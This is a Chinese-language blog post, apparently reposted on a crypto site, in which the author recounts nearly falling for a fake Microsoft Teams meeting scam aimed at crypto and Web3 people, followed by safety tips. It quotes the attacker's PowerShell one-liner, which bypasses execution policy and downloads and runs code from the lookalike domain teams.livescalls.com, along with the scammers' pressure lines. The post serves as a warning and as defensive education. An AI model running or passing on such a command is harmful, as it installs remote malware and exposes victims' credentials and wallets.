让我告诉你,今天早些时候我是如何差点成为一场精心设计的社交工程计划的受害者,这个计划旨在利用像Microsoft Teams会议这样日常且看似无害的活动。在大部分互动过程中,一切看起来都很正常。我以为是一位行业联系人联系我安排Microsoft Teams会议,而作为愿意合作的我,很乐意加入通话。剧透警告:对方是个冒充者,他们试图让我在电脑上运行恶意代码。我在这里详述整个经历,是为了提醒加密货币和Web3社区的朋友、熟人和同行。今天差点是我;明天可能就是别人了。
第一步:设置阶段——”让我们来个跟进通话,老朋友”
当你从一位知名加密货币公关公司高级员工的Telegram账户收到消息时,你根本不会想到自己正被卷入钓鱼陷阱。所有典型的危险信号都没有立即显现。这不是随机的私信。我并不是在与一个将”i”微妙地替换为”l”的冒充账户交谈。实际上,我与该账户有聊天记录,所以我认为对方是真人。从他们开始完全友好的重新联系对话起,一切看起来都很正常。不久后,一个用于预订30分钟会议的Calendly链接和一个Microsoft Teams会议邀请。正如我之前所说,在整个互动过程中,我的雷达从未响起。我感受到了与顶级公关公司高级员工应有的相同水平的专业性和耐心。我只知道我从行业联系人的Calendly页面安排了一个Teams会议。
诈骗者使用被黑账户发起联系,发送Teams会议链接。
第二步:”仅限桌面加入”陷阱
会议当天,我像过去至少做过一千次那样,在手机上点击了Teams会议链接。然而,与往常不同,我没有直接进入会议。我没有被重定向到通话中,而是加载了一个屏幕,声称”由于组织者设置,不允许通过移动设备访问此会议”。
“糟糕!这以前从未发生过。”嗯,这也不是意外。回想起来,这可能是第一个真正的危险信号。错误屏幕是设计的一部分。诈骗者需要你在桌面或笔记本电脑上,因为他们的恶意负载是一个只能在PC上运行的命令行脚本。
浏览器中的URL “teams.livescalls.com” 不是真正的微软域名。合法的Teams会议使用teams.microsoft.com或teams.live.com。”livescalls.com”域名从远处看足够接近真实域名,但如果你仔细观察,它与真实域名相差甚远。一个是微软控制的网站,声称拥有超过3.2亿日活跃用户。另一个是攻击者控制的完全虚假网站。
公平地说,一些组织可能为其团队会议使用自定义域名。然而,根据世界经济论坛的数据,2025年诈骗者造成的资金损失超过1万亿美元,这足以让我不忽视我的蜘蛛感应。
虚假的”团队访问通知”页面阻止移动访问,迫使受害者使用可以运行恶意脚本的桌面设备。注意URL:teams.livescalls.com——不是微软域名。
诈骗者在移动设备被阻止后向受害者施压,要求其在桌面加入,声称”合作伙伴正在等待”。
第三步:负载阶段——”更新您的TeamsFx SDK”
在桌面上,虚假的Teams会议显示了一个专业设计的页面,看起来像是你在官方微软文档中会看到的东西。它甚至包含了真实的微软语言,关于TeamsFx SDK将在2025年9月被弃用。解决方案?复制一个代码块并在终端或命令提示符中运行它。
如果你额外进行谷歌搜索,你会发现类似的SDK确实存在。你只是不需要它来进行这个teams通话。代码起初看起来无害——它设置了听起来很官方的环境变量,如TeamsFx_API_KEY和MS_Teams_API_SECRET。但真正的攻击向量夹在中间某处,而这些攻击者并不指望你发现问题:
powershell -ep bypass -c "(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex"
这一行代码绕过了PowerShell安全策略(-ep bypass),从攻击者的服务器下载代码,并立即执行它(iex = Invoke-Expression)。就这样,无论攻击者托管了什么恶意软件、键盘记录器或远程访问工具,都会悄悄安装到你的设备上。
虚假的Teams会议界面显示向参与者展示的恶意”TeamsFx SDK更新”页面。注意通话中的参与者——AI生成的视频。
第四步:”别担心,很安全”施压阶段
当我表示对运行脚本犹豫不决时,冒充者立即给出了安慰和施压的组合。”别担心,这对你来说非常简单安全”这句话本应让我轻松地按照截图中的指示操作,展示如何在PC上打开命令提示符。”合作伙伴已经加入Zoom”本应让我感受到压力,不必让所有人因为我不知道如何运行简单的命令提示符而切换平台。
我没有被安慰。我也没有感受到压力。当我建议将通话转移到Google Meet时,他们拒绝了。显然,他们的诈骗只通过他们虚假的Teams设置有效。
诈骗者发送逐步指示运行恶意代码,安慰受害者:”别担心,这对你来说非常简单安全”。
第五步:揭穿骗局——被阻止和删除
在检查了脚本和域名后,我确认了我的怀疑:我正在被社交工程攻击,距离成为世界经济论坛2026年统计数据只有几步之遥。我直接告诉诈骗者:”我刚检查过,这个命令和网站都不合法。很抱歉我无法这样做。”我提出如果他们还想聊天,可以在Google Meet上继续对话。
“但会议现在正在进行中,”是另一端的消息。正如预期的那样,他们的回应是为了让我意识到加入通话的紧迫性。毕竟,我不想让所有那些合作伙伴等待太久。片刻之后,他们删除了我们所有的通信记录并阻止了我。
啊……这不仅仅是一个危险信号。简直是深红色警报。商业联系人不会在你质疑软件更新时立即删除整个对话历史记录并阻止你。
诈骗被揭穿后,攻击者坚称会议”现在正在进行中”,然后删除所有消息并阻止受害者。
如何保护自己
这种类型的攻击正在加密货币、Web3和科技行业激增。诈骗者正在入侵或冒充属于公关专业人士、投资者和项目负责人的真实账户,以针对高价值个人。以下是如何保持安全:
- 永远不要从会议页面运行命令。 合法的视频通话平台永远不会要求你将代码粘贴到终端或命令提示符中。
- 检查URL。 真正的Microsoft Teams会议位于teams.microsoft.com或teams.live.com——而不是”teams.livescalls.com”或任何其他类似的域名。
- 对”仅限桌面”要求保持怀疑。 如果会议阻止移动访问,那是一种故意策略,目的是让你使用可以执行脚本的机器。
- 通过单独渠道验证对方身份。 如果已知联系人发送给你一个不寻常的会议链接,直接打电话给他们或在不同的平台上发消息确认。
- 注意”powershell -ep bypass”和”iex”。 这是任何脚本中最大的两个危险信号。第一个禁用安全性,第二个盲目执行下载的代码。
如果你已经运行了脚本:
- 立即断开互联网连接。
- 运行完整的恶意软件扫描(Malwarebytes、Windows Defender离线扫描)。
- 从另一台干净的设备更改所有密码。
- 监控加密货币钱包和银行账户是否有未经授权的交易。
这对加密货币和Web3为何重要
我不会称这是典型的钓鱼互动,攻击者撒下大网,看看能捞到什么。不,这是一次有针对性的、多日的社交工程操作。攻击者扮演行业同行数日,建立融洽关系,并设置好通过一个令人信服的虚假微软页面,在Teams通话中随意引导你解决技术问题。
无论他们是窃取你的凭证、清空你的加密货币钱包,还是安装持久的远程访问恶意软件,攻击者都有利可图,毫无损失。如果你是创始人、投资者或任何在加密货币和科技领域参加会议的人,请与你的团队分享这篇文章。运行这些诈骗的人正在变得更好,唯一的防御就是提高意识。
本网站所有区块链相关数据与资料仅供用户学习及研究之用,不构成任何投资建议。转载请注明出处:https://www.lianxinshe666.com/2026/03/01/%e6%88%91%e5%b7%ae%e7%82%b9%e5%9c%a8microsoft-teams%e4%bc%9a%e8%ae%ae%e4%b8%ad%e8%a2%ab%e9%bb%91%e5%ae%a2%e6%94%bb%e5%87%bb-%e8%bf%99%e7%a7%8d%e8%af%88%e9%aa%97%e6%98%af%e5%a6%82/
